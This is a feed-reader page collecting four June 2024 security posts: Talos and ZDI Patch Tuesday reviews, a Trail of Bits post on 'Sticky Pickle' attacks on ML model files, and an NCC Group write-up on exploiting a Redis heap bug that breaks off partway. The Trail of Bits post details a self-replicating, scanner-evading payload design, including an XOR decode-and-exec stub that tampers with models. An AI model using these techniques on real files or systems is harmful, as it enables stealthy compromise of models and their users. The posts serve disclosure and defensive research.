Reading view

There are new articles available, click to refresh the page.

Only one critical issue disclosed as part of Microsoft Patch Tuesday

11 June 2024 at 17:46

Only one critical issue disclosed as part of Microsoft Patch Tuesday

Microsoft released its monthly security update Tuesday, disclosing 49 vulnerabilities across its suite of products and software.

Of those there is only one critical vulnerability. Every other security issues disclosed this month is considered "important."

The lone critical security issue is CVE-2024-30080, a remote code execution vulnerability due to a use-after-free (UAF) issue in the HTTP handling function of Microsoft Message Queuing (MSMQ) messages.

An adversary can send a specially crafted malicious MSMQ packet to an MSMQ server, potentially allowing them to perform remote code execution on the server side. Microsoft considers this vulnerability “more likely” to be exploited.

There is also a remote code execution vulnerability in Microsoft Outlook, CVE-2024-30103. By successfully exploiting this vulnerability, an adversary can bypass Outlook registry block lists and enable the creation of malicious DLL (Dynamic Link Library) files. However, the adversary must be authenticated using valid Microsoft Exchange user credentials. Microsoft has also mentioned that the Outlook application Preview Pane is an attack vector.

The company also disclosed a high-severity elevation of privilege vulnerability in Azure Monitor agent (CVE-2024-35254). An unauthenticated adversary with read access permissions can exploit this vulnerability by performing arbitrary file and folder deletion on a host where the Azure Monitor Agent is installed. However, this vulnerability does not disclose confidential information, but it could allow the adversary to delete data that could result in a denial of service.

CVE-2024-30077, a high-severity remote code execution vulnerability in Microsoft OLE (Object Linking and Embedding), could also be triggered if an adversary tricks an authenticated user into attempting to connect to a malicious SQL server database via a connection driver (OLE DB or OLEDB). This could result in the database returning malicious data that could cause arbitrary code execution on the client.

The Windows Wi-Fi driver also contains a high-severity remote code execution vulnerability, CVE-2024-30078. An adversary can exploit this vulnerability by sending a malicious networking packet to an adjacent system employing a Wi-Fi networking adapter, which could enable remote code execution. However, to exploit this vulnerability, an adversary must be near the target system to send and receive radio transmissions.

CVE-2024-30063 and CVE-2024-30064 are high-severity elevation of privilege vulnerabilities in the Windows Distributed File System (DFS). An adversary who successfully exploits these vulnerabilities could gain elevated privileges through a vulnerable DFS client, allowing the adversary to locally execute arbitrary code in the kernel. However, an adversary must be locally authenticated to exploit these vulnerabilities by running a specially crafted application.

Talos would also like to highlight a few more high-severity elevation of privilege vulnerabilities that Microsoft considers are “more likely” to be exploited.

CVE-2024-30068, an elevation of privilege vulnerabilities in the Windows kernel, exists that could allow an adversary to gain SYSTEM-level privileges. By exploiting this vulnerability from a low-privilege AppContainer, an adversary can elevate their privileges and execute code or access resources at a higher integrity level than that of the AppContainer execution environment. However, the adversary should first login to the system and then run a specially crafted application that could exploit the vulnerability and take control of an affected system.

There are three high-severity elevation of privilege vulnerabilities — CVE-2024-30082, CVE-2024-30087 and CVE-2024-30091 — in Win32K kernel drivers that exist because of an out-of-bounds (OOB) issue. An adversary who exploits CVE-2024-30082 could gain SYSTEM privileges and exploiting CVE-2024-30087 and CVE-2024-30091, would gain the rights of the user that is running the affected application. Microsoft considers these vulnerabilities “more likely” to be exploited.

CVE-2024-30088 and CVE-2024-30099 are two high-severity, and more “likely exploitable” elevation of privilege vulnerabilities in NT kernel drivers. Successful exploitation of these vulnerabilities would provide the local user and SYSTEM privileges to an adversary, respectively.

Mskssrv, a Microsoft Streaming Service kernel driver, also contains two elevation of privilege vulnerabilities: CVE-2024-30089 and CVE-2024-30090. An adversary successfully exploiting these vulnerabilities could gain SYSTEM privileges.

CVE-2024-30084 and CVE-2024-35250 are two more likely exploitable, high-severity elevation of privilege vulnerabilities in the Windows Kernel-Mode driver. An adversary could gain SYSTEM privileges by successfully exploiting these vulnerabilities. However, they must first win a race condition.

A complete list of all the vulnerabilities Microsoft disclosed this month is available on its update page.

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date, and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their rule set by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 63581 - 63591, 63596 and 63597. There are also Snort 3 pre-processor rules 300937 - 300940.

The June 2024 Security Update Review

Zero Day Initiative - Blog

Dustin Childs

11 June 2024 at 17:31

Somehow, we’ve made it to the sixth patch Tuesday of 2024, and Microsoft and Adobe have released their regularly scheduled updates. Take a break from your regular activities and join us as we review the details of their latest security alerts. If you’d rather watch the full video recap covering the entire release, you can check it out here:

Adobe Patches for June 2024

For June, Adobe released 10 patches addressing 165(!) CVEs in Adobe Cold Fusion, Photoshop, Experience Manager, Audition, Media Encoder, FrameMaker Publishing Server, Adobe Commerce, Substance 3D Stager, Creative Cloud Desktop, and Acrobat Android. The fix for Experience Manager is by far the largest with a whopping 143 CVEs addressed. However, all but one of these bugs are simply cross-site scripting (XSS) vulnerabilities. The patch for Cold Fusion fixes two bugs, but neither are code execution bugs. That’s the same case for the patch addressing bugs in Audition. The fix for Media Encoder has a single OOB Read memory leak fixed. The update for Photoshop also has just one bug – a Critical-rated code execution issue. That’s also the story for the Substance 3D Stager patch.

The patch for FrameMaker Publishing Server has only two bugs, but one is a CVSS 10 and the other is a 9.8. If you’re using this product, this should be the first patch you test and deploy. The patch for Commerce should also be high on your test-and-deploy list as it corrects 10 bugs, including some Critical-rated code execution vulns. The patch for Creative Cloud Desktop fixes a single code execution bug. Finally, the patch for Acrobat Android corrects two security feature bypasses.

None of the bugs fixed by Adobe this month are listed as publicly known or under active attack at the time of release. Adobe categorizes these updates as a deployment priority rating of 3.

Microsoft Patches for April 2024

This month, Microsoft released 49 CVEs in Windows and Windows Components; Office and Office Components; Azure; Dynamics Business Central; and Visual Studio. If you include the third-party CVEs being documented this month, the CVE count comes to 58. A total of eight of these bugs came through the ZDI program, and that does include some of the cases reported during the Pwn2Own Vancouver contest in March.

Of the new patches released today, only one is rated Critical, and 48 are rated Important in severity. This release is another small release when compared to the monster that was April.

Only one of the CVEs listed today is listed as publicly known, but that’s actually just a third-party update that’s now being integrated into Microsoft products. Nothing is listed as being under active attack. Let’s take a closer look at some of the more interesting updates for this month, starting with the lone Critical-rated patch for this month:

- CVE-2024-30080 – Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability
This update receives a CVSS rating of 9.8 and would allow remote, unauthenticated attackers to execute arbitrary code with elevated privileges of systems where MSMQ is enabled. That makes this wormable between those servers, but not to systems where MSMQ is disabled. This is similar to the “QueueJumper” vulnerability from last year, but it’s not clear how many affected systems are exposed to the internet. While it is likely a low number, now would be a good time to audit your networks to ensure TCP port 1801 is not reachable.

- CVE-2024-30103 – Microsoft Outlook Remote Code Execution Vulnerability
This patch corrects a bug that allows attackers to bypass Outlook registry block lists and enable the creation of malicious DLL files. While not explicitly stated, attackers would likely then use the malicious DLL files to perform some form of DLL hijacking for further compromise. The good news here is that the attacker would need valid Exchange credentials to perform this attack. The bad news is that the exploit can occur in the Preview Pane. Considering how often credentials end up being sold in underground forums, I would not ignore this fix.

- CVE-2024-30078 – Windows Wi-Fi Driver Remote Code Execution Vulnerability
This vulnerability allows an unauthenticated attacker to execute code on an affected system by sending the target a specially crafted network packet. Obviously, the target would need to be in Wi-Fi range of the attacker and using a Wi-Fi adapter, but that’s the only restriction. Microsoft rates this as “exploitation less likely” but considering it hits every supported version of Windows, it will likely draw a lot of attention from attackers and red teams alike.

Here’s the full list of CVEs released by Microsoft for June 2024:

CVE	Title	Severity	CVSS	Public	Exploited	Type
CVE-2024-30080	Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability	Critical	9.8	No	No	RCE
CVE-2024-35255	Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability	Important	5.5	No	No	EoP
CVE-2024-35254 †	Azure Monitor Agent Elevation of Privilege Vulnerability	Important	7.1	No	No	EoP
CVE-2024-37325 †	Azure Science Virtual Machine (DSVM) Elevation of Privilege Vulnerability	Important	9.8	No	No	EoP
CVE-2024-35252	Azure Storage Movement Client Library Denial of Service Vulnerability	Important	7.5	No	No	DoS
CVE-2024-30070	DHCP Server Service Denial of Service Vulnerability	Important	7.5	No	No	DoS
CVE-2024-29187 *	GitHub: CVE-2024-29187 WiX Burn-based bundles are vulnerable to binary hijack when run as SYSTEM	Important	7.3	No	No	EoP
CVE-2024-35253	Microsoft Azure File Sync Elevation of Privilege Vulnerability	Important	4.4	No	No	EoP
CVE-2024-35263	Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability	Important	5.7	No	No	Info
CVE-2024-35248	Microsoft Dynamics 365 Business Central Elevation of Privilege Vulnerability	Important	7.3	No	No	EoP
CVE-2024-35249	Microsoft Dynamics 365 Business Central Remote Code Execution Vulnerability	Important	8.8	No	No	RCE
CVE-2024-30072	Microsoft Event Trace Log File Parsing Remote Code Execution Vulnerability	Important	7.8	No	No	RCE
CVE-2024-30104	Microsoft Office Remote Code Execution Vulnerability	Important	7.8	No	No	RCE
CVE-2024-30101	Microsoft Office Remote Code Execution Vulnerability	Important	7.5	No	No	RCE
CVE-2024-30102	Microsoft Office Remote Code Execution Vulnerability	Important	7.3	No	No	RCE
CVE-2024-30103	Microsoft Outlook Remote Code Execution Vulnerability	Important	8.8	No	No	RCE
CVE-2024-30100	Microsoft SharePoint Server Remote Code Execution Vulnerability	Important	7.8	No	No	RCE
CVE-2024-30097	Microsoft Speech Application Programming Interface (SAPI) Remote Code Execution Vulnerability	Important	8.8	No	No	RCE
CVE-2024-30089	Microsoft Streaming Service Elevation of Privilege Vulnerability	Important	7.8	No	No	EoP
CVE-2024-30090	Microsoft Streaming Service Elevation of Privilege Vulnerability	Important	7	No	No	EoP
CVE-2023-50868 *	MITRE: CVE-2023-50868 NSEC3 closest encloser proof can exhaust CPU	Important	7.5	Yes	No	DoS
CVE-2024-29060	Visual Studio Elevation of Privilege Vulnerability	Important	6.7	No	No	EoP
CVE-2024-30052	Visual Studio Remote Code Execution Vulnerability	Important	4.7	No	No	RCE
CVE-2024-30082	Win32k Elevation of Privilege Vulnerability	Important	7.8	No	No	EoP
CVE-2024-30087	Win32k Elevation of Privilege Vulnerability	Important	7.8	No	No	EoP
CVE-2024-30091	Win32k Elevation of Privilege Vulnerability	Important	7.8	No	No	EoP
CVE-2024-30085	Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability	Important	7.8	No	No	EoP
CVE-2024-30076	Windows Container Manager Service Elevation of Privilege Vulnerability	Important	6.8	No	No	EoP
CVE-2024-30096	Windows Cryptographic Services Information Disclosure Vulnerability	Important	5.5	No	No	Info
CVE-2024-30063	Windows Distributed File System (DFS) Remote Code Execution Vulnerability	Important	6.7	No	No	RCE
CVE-2024-30064	Windows Kernel Elevation of Privilege Vulnerability	Important	8.8	No	No	EoP
CVE-2024-30068	Windows Kernel Elevation of Privilege Vulnerability	Important	8.8	No	No	EoP
CVE-2024-30088	Windows Kernel Elevation of Privilege Vulnerability	Important	7	No	No	EoP
CVE-2024-30099	Windows Kernel Elevation of Privilege Vulnerability	Important	7	No	No	EoP
CVE-2024-35250	Windows Kernel-Mode Driver Elevation of Privilege Vulnerability	Important	7.8	No	No	EoP
CVE-2024-30084	Windows Kernel-Mode Driver Elevation of Privilege Vulnerability	Important	7	No	No	EoP
CVE-2024-30074	Windows Link Layer Topology Discovery Protocol Remote Code Execution Vulnerability	Important	8	No	No	RCE
CVE-2024-30075	Windows Link Layer Topology Discovery Protocol Remote Code Execution Vulnerability	Important	8	No	No	RCE
CVE-2024-30077	Windows OLE Remote Code Execution Vulnerability	Important	8	No	No	RCE
CVE-2024-35265	Windows Perception Service Elevation of Privilege Vulnerability	Important	7	No	No	EoP
CVE-2024-30069	Windows Remote Access Connection Manager Information Disclosure Vulnerability	Important	4.7	No	No	Info
CVE-2024-30094	Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability	Important	7.8	No	No	RCE
CVE-2024-30095	Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability	Important	7.8	No	No	RCE
CVE-2024-30083	Windows Standards-Based Storage Management Service Denial of Service Vulnerability	Important	7.5	No	No	DoS
CVE-2024-30062	Windows Standards-Based Storage Management Service Remote Code Execution Vulnerability	Important	7.8	No	No	RCE
CVE-2024-30093	Windows Storage Elevation of Privilege Vulnerability	Important	7.3	No	No	EoP
CVE-2024-30065	Windows Themes Denial of Service Vulnerability	Important	5.5	No	No	DoS
CVE-2024-30078	Windows Wi-Fi Driver Remote Code Execution Vulnerability	Important	8.8	No	No	RCE
CVE-2024-30086	Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability	Important	7.8	No	No	EoP
CVE-2024-30066	Winlogon Elevation of Privilege Vulnerability	Important	5.5	No	No	EoP
CVE-2024-30067	WinLogon Elevation of Privilege Vulnerability	Important	5.5	No	No	EoP
CVE-2024-5493 *	Chromium: CVE-2024-5493 Heap buffer overflow in WebRTC	High	N/A	No	No	RCE
CVE-2024-5494 *	Chromium: CVE-2024-5494 Use after free in Dawn	High	N/A	No	No	RCE
CVE-2024-5495 *	Chromium: CVE-2024-5495 Use after free in Dawn	High	N/A	No	No	RCE
CVE-2024-5496 *	Chromium: CVE-2024-5496 Use after free in Media Session	High	N/A	No	No	RCE
CVE-2024-5497 *	Chromium: CVE-2024-5497 Out of bounds memory access in Keyboard Inputs	High	N/A	No	No	RCE
CVE-2024-5498 *	Chromium: CVE-2024-5498 Use after free in Presentation API	High	N/A	No	No	RCE
CVE-2024-5499 *	Chromium: CVE-2024-5499 Out of bounds write in Streams API	High	N/A	No	No	RCE

* Indicates this CVE had been released by a third party and is now being included in Microsoft releases.

† Indicates further administrative actions are required to fully address the vulnerability.

Looking at the other fixes addressing code execution bugs, there are a couple that stand out. In addition to the Wi-Fi bug above, there are two similar bugs in the Link Layer Topology Discovery Protocol with similar exploit vectors. The difference is that for these two bugs, the target needs to be running the Network Map functionality for the attack to succeed. There are several “open-and-own” type vulnerabilities getting patched. The one to look out for would be the Office bug that states, “The Preview Pane is an attack vector, but additional user interaction is required.” It’s not clear how that would manifest. The exploit for DFS requires an adjacent attacker to already be executing code on a target, which reads more like an EoP to me. The OLE bug requires connecting to a malicious SQL server. The bug in the Speech Application Programming Interface (SAPI) requires a user to click a link to connect to the attacker’s server. Lastly, the code execution bug in Dynamics 365 requires authentication, which again sounds more like an EoP, but it also states no user interaction is required. It’s an odd write-up that implies it’s unlikely to be exploited in the wild.

More than half of this month’s release corrects privilege escalation bugs, but the majority of these lead to SYSTEM-level code execution if an authenticated user runs specially crafted code. Other privilege escalation bugs would allow the attacker to get to the level of the running application. The bugs in Winlogon are somewhat intriguing as they could allow an attacker to replace valid file content with specially crafted file content. One of the kernel bugs could be used for a container escape. The bug in the Perception Service could allow elevation to the “NT AUTHORITY\LOCAL SERVICE” account. The vulnerability in Visual Studio requires an attacker to create a malicious extension. An authenticated user would then need to create a Visual Studio project that uses that extension. If they manage all of that, it would lead to admin privileges.

The bug in Azure Identity Libraries and Microsoft Authentication Library allows attackers to read any file on the target with SYSTEM privileges. The privilege escalation in Azure Monitor Agent could let attackers delete files and folders. If you’ve disabled Automatic Extension Upgrades, you’ll need to perform a manual update to ensure the Monitor Agent is at the latest version. Speaking of extra actions, the bug in the Azure Science Virtual Machine (DSVM) requires you to upgrade your DSVM to Ubuntu 20.04. If you’re not familiar with this procedure, Microsoft provides this article for guidance. Attackers who exploit this bug could gain access to user credentials, which would allow them to impersonate authorized users.

There are only three information disclosure bugs receiving fixes this month and only one results in info leaks consisting of unspecified memory contents. The bug in the on prem version of Dynamics 365 could allow an attacker to exfiltrate all the data accessible to the logged-on user. The vulnerability in the Cryptographic Services could disclose sensitive information such as KeyGuard (KG) keys, which are intended to be per-boot and used to protect sensitive data. If an attacker could potentially use these to decrypt anything encrypted with those keys.

The final bugs for June address Denial-of-Service (DoS) vulnerabilities in Windows and Azure components. Unfortunately, Microsoft provides no additional information about these bugs and how they would manifest on affected systems. They do note the DoS in the DHCP Server does not affect those who have configured failover for their DHCP setup.

There are no new advisories in this month’s release.

Looking Ahead

The next Patch Tuesday of 2024 will be on July 9, and I’ll return with details and patch analysis then. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!

Exploiting ML models with pickle file attacks: Part 2

Trail of Bits Blog

Trail of Bits

11 June 2024 at 15:00

By Boyan Milanov

In part 1, we introduced Sleepy Pickle, an attack that uses malicious pickle files to stealthily compromise ML models and carry out sophisticated attacks against end users. Here we show how this technique can be adapted to enable long-lasting presence on compromised systems while remaining undetected. This variant technique, which we call Sticky Pickle, incorporates a self-replicating mechanism that propagates its malicious payload into successive versions of the compromised model. Additionally, Sticky Pickle uses obfuscation to disguise the malicious code to prevent detection by pickle file scanners.

Making malicious pickle payloads persistent

Recall from our previous blog post that Sleepy Pickle exploits rely on injecting a malicious payload into a pickle file containing a packaged ML model. This payload is executed when the pickle file is deserialized to a Python object, compromising the model’s weights and/or associated code. If the user decides to modify the compromised model (e.g., fine-tuning) and then re-distribute it, it will be serialized in a new pickle file that the attacker does not control. This process will likely render the exploit ineffective.

To overcome this limitation we developed Sticky Pickle, a self-replication mechanism that wraps our model-compromising payload in an encapsulating, persistent payload. The encapsulating payload does the following actions as it’s executed:

1. Find the original compromised pickle file being loaded on the local filesystem.
2. Open the file and read the encapsulating payload’s bytes from disk. (The payload cannot access them directly via its own Python code.)
3. Hide its own bytecode in the object being unpickled under a predefined attribute name.
4. Hook the pickle.dump() function so that when an object is re-serialized, it:
  - Serializes the object using the regular pickle.dump() function.
  - Detects that the object contains the bytecode attribute.
  - Manually injects the bytecode in the new Pickle file that was just created.

Figure 1: Persistent payload in malicious ML model files

With this technique, malicious pickle payloads automatically spread to derivative models without leaving a trace on the disk outside of the infected pickle file. Moreover, the ability to hook any function in the Python interpreter allows for other attack variations as the attacker can access other local files, such as training datasets or configuration files.

Payload obfuscation: Going under the radar

Another limitation of pickle-based exploits arises from the malicious payload being injected directly as Python source code. This means that the malicious code appears in plaintext in the Pickle file. This has several drawbacks. First, it is possible to detect the attack with naive file scanning and a few heuristics that target the presence of significant chunks of raw Python within Pickle files. Second, it’s easy for security teams to identify the attack and its intent just by looking at it.

We developed a payload obfuscation and encoding method that overcomes these limitations and makes payload detection much harder. Starting with our original payload consisting of code that compromises the pickled ML model, we modify it in two ways.

First, we obfuscate the payload by compiling it into a Python code object and serializing it into a string with the marshal library. This lets us inject this serialized payload string into the pickle file, followed by a special bytecode sequence. When executed, this special sequence calls marshal.loads() on the string to reconstruct the code object of the payload and execute it. This makes the payload completely unreadable to scanners or human inspection as it is injected as compiled Python bytecode instead of source code.

Second, we use a simple XOR encoding to vary the payload in every infected file. Instead of consisting of only the original model-compromising code, the XORed payload contains the XOR-encoded Python source of the original payload and a decoding and execution stub similar to this:

def compromise_model(model):
    # The string of the XOR-encoded python payload source code
    encoded_payload = 
    # This line decodes the payload and executes it
    exec(bytearray(b ^ 0x{XOR_KEY:X} for b in encoded_payload))
    return model

Since the obfuscation key can take any value and is hardcoded in the decoding stub, this method complements the persistence feature by allowing attackers to write a payload that generates a new obfuscation key upon reinjection in a new pickle file. This results in different Python payloads, code objects, and final pickle payloads being injected into compromised files, while the malicious behavior remains unchanged.

Figure 2: Obfuscation of the Python payload before injection in a pickle file

Figure 2 shows how this obfuscation method completely hides the malicious payload within the file. Automated tools or security analysts scanning the file would see only:

The raw bytes of the Python payload that was compiled and then marshaled. It is difficult, if not impossible, to interpret these bytes and flag them as dangerous with static scanning.
The pickle sequence that calls marshal.loads(). This is a common pattern also found in benign pickle files and thus is not sufficient to alert users about potential malicious behavior.

When a pickle file containing the obfuscated payload is loaded, the payload stages are executed in the following order, illustrated in figure 3:

The malicious pickle opcodes load the raw bytes of the serialized code object, then reconstruct the Python code object using marshal.load(), and finally execute the code object.
The code object is executed and decodes the XOR-encoded Python source code of the original payload.
The decoded original payload code is executed and compromises the loaded ML model.

Figure 3: Overview of execution stages of the obfuscated payload

Sealing the lid on pickle

These persistence and evasion techniques show the level of sophistication that pickle exploits can achieve. Expanding on the critical risks we demonstrated in part one of this series, we’ve seen how a single malicious pickle file can:

Compromise other local pickle files and ML models.
Evade file scanning and make manual analysis significantly harder.
Make its payload polymorphic and spread it under an ever-changing form while maintaining the same final stage and end goal.

While these are only examples among other possible attack improvements, persistence and evasion are critical aspects of pickle exploits that, to our knowledge, have not yet been demonstrated.

Despite the risks posed by pickle files, we acknowledge that It will be a long-term effort for major frameworks of the ML ecosystem to move away from them. In the short-term, here are some action steps you can take to eliminate your exposure to these issues:

Avoid using pickle files to distribute serialized models.
Adopt safer alternatives to pickle files such as HuggingFace’s SafeTensors.
- Also check out our security assessment of SafeTensors!
If you must use pickle field, scan them with our very own Fickling to detect pickle-based ML attacks.

Long-term, we are continuing our efforts to drive the ML industry to adopt secure-by-design technologies. If you want to learn more about our contributions, check out our awesome-ml-security and ml-file-formats Github repositories and our recent responsible disclosure of a critical GPU vulnerability called Leftover Locals!

Acknowledgments

Thanks to our intern Russel Tran for their hard work on pickle payload obfuscation and optimization.

Pumping Iron on the Musl Heap – Real World CVE-2022-24834 Exploitation on an Alpine mallocng Heap

NCC Group Research

Aaron Adams

11 June 2024 at 14:36

Pumping
Iron on the Musl Heap – Real World CVE-2022-24834 Exploitation on an
Alpine mallocng Heap

This post is about exploiting CVE-2022-24834 against a Redis
container running on Alpine
Linux. CVE-2022-24834 is a vulnerability affecting the Lua cjson
module in Redis servers <=7.0.11. The bug is an integer overflow that
leads to a large copy of data, approximately 350MiB.

A colleague from NCC Group wanted to exploit this bug but found that
the public exploits didn’t work. This was ultimately due to those
exploits being written to target Ubuntu or similar distros, which use
the GNU libc library.
The target in our case was Alpine 13.8, which uses musl libc 1.2.4. The important
distinction here is that GNU libc uses the ptmalloc2 heap allocator, and
musl 1.2.4 uses its own custom allocator called mallocng. This resulted
in some interesting differences during exploitation, which I figured I
would document since there’s not a lot of public information about
targeting the musl heap.

I highly recommend reading Ricerca Security’s original writeup,
which goes into depth about the vulnerability and how they approached
exploitation on ptmalloc2. Conviso Lab’s has a README.md that
describes some improvements that they made, which is also worth a look.
There are quite a few differences between exploitation on ptmalloc2 and
mallocng, which I’ll explain as I go. I’ll try not to repeat the details
that previous research has already provided but rather focus on the
parts that differed for mallocng.

Finally, I want to note that I am not attacking the musl mallocng
allocator by corrupting its metadata, but rather I’m doing Lua-specific
exploitation on the mallocng heap, mimicking the strategy done by the
original exploit.

Lua 5.1

As the previous articles covered Lua internals in detail, I won’t
repeat that information here. Redis uses Lua 5.1, so it’s important to
refer to the specific version when reading, as Lua has undergone
significant changes across different releases. These changes include
structure layouts and the garbage collection algorithm utilized.

I would like to highlight that Lua utilizes Tagged Values to
represent various internal types such as numbers and tables. The
structure is defined as follows:

/*
** Tagged Values
*/

#define TValuefields                                                           \
    Value value;                                                               \
    int   tt

typedef struct lua_TValue {
    TValuefields;
} TValue;

In this structure, tt denotes the type, and
value can either be an inline value or a pointer depending
on the associated type. In Lua, a Table serves as the
primary storage type, akin to a dictionary or list in Python. It
contains an array of TValue structures. For simple types
like integers, value is used directly. However, for more
complex types like nested tables, value acts as a pointer.
For further implementation details, please refer to Lua’s
lobject.h file or the aforementioned articles.

During debugging, I discovered the need to inspect Lua 5.1 objects.
The Alpine redis-server target did not include symbols for
the static Lua library. To address this, I compiled my own version of
Lua and filtered out all function symbols to only access the structure
definitions easily. This was achieved by identifying and stripping out
all FUNC symbols using readelf -Ws and
objcopy --strip-symbol.

Additionally, I came across the GdbLuaExtension,
which offers pretty printers and other functionalities for analyzing Lua
objects, albeit supporting version 5.3 only. I made some minor
modifications to enable its compatibility with Lua 5.1. These
changes enabled features like pretty printers for tables, although I
didn’t conduct exhaustive testing on the required functionalities.

This method provides a clearer analysis of objects like a
Table, presenting information in a more readable format
compared to a hexdump.

(gdb) p/x *(Table *) 0x7ffff7a05100
$2 = <lua_table> = {
  [1] = (TValue *) 0x7fffaf9ef620 <lua_table^> 0x7ffff4a76322,
  [2] = (TValue *) 0x7fffaf9ef630 <lua_table^> 0x7ffff7a051a0,
  [3] = (TValue *) 0x7fffaf9ef640 <lua_table^> 0x7ffff7a051f0,
  [4] = (TValue *) 0x7fffaf9ef650 <lua_table^> 0x7ffff7a05290,
  [5] = (TValue *) 0x7fffaf9ef660 <lua_table^> 0x7ffff7a052e0,

The Table we printed shows an array of
TValue structures, and we can see that each
TValue in our table is referencing another table.

Musl’s Next
Generation Allocator – aka mallocng

On August 4, 2020,
musl 1.2.1 shipped a new heap algorithm called “mallocng”. This
allocator has received some good quality research in the past,
predominantly focused on CTF challenge exploitation. I didn’t find any
real-world exploitation examples, but if someone knows of some, please
let me know and I’ll update the article.

The mallocng allocator is slab-based and organizes fixed-sized
allocations (called slots) on multi-page slabs (called
groups). In general, groups are mmap()-backed.
However, groups containing small slots may actually be less than a size
of a page, in which case the group is actually just a larger fixed-sized
slot on a larger group. The allocator not using brk() is an
important detail as we will see later. The fixed size for a given group
is referred to as the group’s stride.

The mallocng allocator seems to be designed with security in mind,
mixing a combination of in-band metadata that contains some cookies,
with predominantly out-of-band metadata which is stored in slots on
dedicated group mappings that are prefixed with guard pages to prevent
corruption from linear overflows.

As I’m not actually going to be exploiting the allocator internals
itself, I won’t go into too much detail about the data structures. I
advise you to read pre-existing articles, which you can find in the
resource section.

There’s a useful gdb plugin called muslheap developed by
xf1les, which I made a lot of use of. xf1les also has an associated blog
post which is worth reading. At the time of writing, I have a PR open to add
this functionality to pwndbg, and hopefully will have time add some more
functionality to it afterwards.

There is one particularly interesting aspect of the allocator that I
want to go over, which is that it can adjust the starting offset of
slots inside a group across subsequent allocations, using a value it
calls the cycling offset. It only does so if the overhead of a given
slot inside the fixed size has a large enough remainder such that the
offset can be adjusted. Interestingly, in this case, because the slot we
are working in is the 0x50-stride group, and the Table
structure is 0x48 bytes, this cycling offset doesn’t apply. Since I
narrowly avoided having to deal with this, and originally thought I
would have to, I’ll still take a moment to explain what the mitigation
actually is for and what it looks like in practice.

mallocng Cycling Offset

The cycling offset is a technique used to mitigate double frees,
although it can have a negative effect on other exploitation scenarios
as well. It works by adjusting the offset of the user data part of an
allocation each time a chunk is used, wrapping back to the beginning
once the offset is larger than the slack space. The offset starts at 1
and increments each time the chunk is reused.

The idea behind mitigating a double free is that if a chunk is used
and then freed, and then re-used, the offset used for the second
allocation will not be the same as the first time, due to cycling. Then,
when it is double freed, that free will detect some in-band metadata
anomaly and fail.

The allocator goes about this offset cycling by abusing the fact that
groups have fixed-sized slots, and often the user data being allocated
will not fill up the entire space of the slot, resulting in some slack
space. If the remaining slack space in the slot is large enough, which
is calculated by subtracting both the size of the user data and the
required in-line metadata, then there are actually two in-line metadata
blocks used inside a slot. One contains an offset used to indicate the
actual start of the user data, and that user data will still have some
metadata prefixed before it.

The offset calculation is done in the enframe()
function in mallocng. Basically, each time a slot is allocated, the
offset is increased, and will wrap back around when it exceeds the size
of the slack.

To demonstrate what the cycling offset looks like in practice, I will
focus on larger-than-Table stride groups, that have enough
slack such that the cycling offset will be used. If we review what the
stride sizes are, we see:

sizeclass	stride	sizeclass	stride	sizeclass	stride	sizeclass	stride
1	0x20	13	0x140	25	0xaa0	37	0x5540
2	0x30	14	0x190	26	0xcc0	38	0x6650
3	0x40	15	0x1f0	27	0xff0	39	0x7ff0
4	0x50	16	0x240	28	0x1240	40	0x9240
5	0x60	17	0x2a0	29	0x1540	41	0xaaa0
6	0x70	18	0x320	30	0x1990	42	0xccc0
7	0x80	19	0x3f0	31	0x1ff0	43	0xfff0
8	0x90	20	0x480	32	0x2480	44	0x12480
9	0xa0	21	0x540	33	0x2aa0	45	0x15540
10	0xc0	22	0x660	34	0x3320	46	0x19980
11	0xf0	23	0x7f0	35	0x3ff0	47	0x1fff0

Using a cycling offset requires an additional 4-byte in-band header
and also increases by UNIT-sized (16-byte) increments. As
such, I think it’s unlikely for strides <= 0xf0 to have the cycling
offset applied (though I haven’t tested each). There might be some
exceptions, like if sometimes smaller allocations are placed into larger
strides rather than always allocating a new group, but I’m not sure if
that’s possible as I haven’t spent enough time studying the allocator
yet.

In light of this understanding, for the sake of demonstrating when
cycling offsets are used, we’ll look at the 0x140 stride. I allocate a
few tables, fill their arrays such that the resulting sizes are ~0x100
bytes.

I use Lua to leak the address of an outer table. Then in gdb I
analyze the array of all the tables it references, which should be of
increasing size. Let’s look at the first inner table’s array first:

pwndbg> p/x *(Table *)  0x7ffff7a945b0
$2 = <lua_table> = {
  [1] = (TValue *) 0x7ffff7a99880 <lua_table^> 0x7ffff7a94740,
  [2] = (TValue *) 0x7ffff7a99890 <lua_table^> 0x7ffff7a93d80,
  [3] = (TValue *) 0x7ffff7a998a0 <lua_table^> 0x7ffff7a93e70,
  [4] = (TValue *) 0x7ffff7a998b0 <lua_table^> 0x7ffff7a95040,
  [5] = (TValue *) 0x7ffff7a998c0 <lua_table^> 0x7ffff7a950e0,
...
pwndbg> p/x ((Table *)  0x7ffff7a94740)->array
$4 = 0x7ffff7a94e40
pwndbg> mchunkinfo 0x7ffff7a94e40
============== IN-BAND META ==============
        INDEX : 2
     RESERVED : 5 (Use reserved in slot end)
     OVERFLOW : 0
    OFFSET_16 : 0x29 (group --> 0x7ffff7a94ba0)

================= GROUP ================== (at 0x7ffff7a94ba0)
         meta : 0x555555a69040
   active_idx : 2

================== META ================== (at 0x555555a69040)
         prev : 0x0
         next : 0x0
          mem : 0x7ffff7a94ba0
     last_idx : 2
   avail_mask : 0x0 (0b0)
   freed_mask : 0x0 (0b0)
  area->check : 0x8bbd98bb29552bcc
    sizeclass : 13 (stride: 0x140)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: [U]UU (from slot 2 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : queue (active[13])

================== SLOT ================== (at 0x7ffff7a94e30)
      cycling offset : 0x1 (userdata --> 0x7ffff7a94e40)
